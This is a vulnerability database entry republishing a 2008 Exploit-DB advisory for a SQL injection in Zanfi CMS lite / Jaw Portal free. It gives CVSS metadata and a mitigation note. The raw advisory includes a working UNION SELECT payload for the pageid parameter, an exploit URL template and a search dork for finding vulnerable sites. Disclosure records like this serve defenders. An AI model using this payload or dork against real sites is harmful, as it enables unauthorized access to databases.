Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability

vendor:

Zanfi CMS lite / Jaw Portal free

by:

Cru3l.b0y

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Zanfi CMS lite / Jaw Portal free

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:zanfi:zanfi_cms_lite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability

A SQL injection vulnerability exists in Zanfi CMS lite / Jaw Portal free. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the application database and potentially compromise the application and the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +    Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability    +
        +                                                                    +
        +                   Discovered by Cru3l.b0y                          +
        +                                                                    +
        +                     WwW.DeltaHacking.Net                           +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


		
AUTHOR : Cru3l.b0y
DATE   : 10 sep 2008
SITE   : WwW.DeltaHacking.Net


#####################################################
APPLICATION : Zanfi CMS lite / Jaw Portal free
DOWNLOAD    : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
VENDOR      : http://www.zanfi.nl/
Dork        : Powered by: Zanfi Solutions
#####################################################


[+] SQL     : DBpAGE&pageid=-1'+union+select+version(),user()/*
[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]




################################################################
# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net #
################################################################


WebSite: WwW.DeltaHacking.Net  &  WwW.w3bsecurity.iR

Contact: Cru3l.b0y[at]gmail.com

# milw0rm.com [2008-09-10]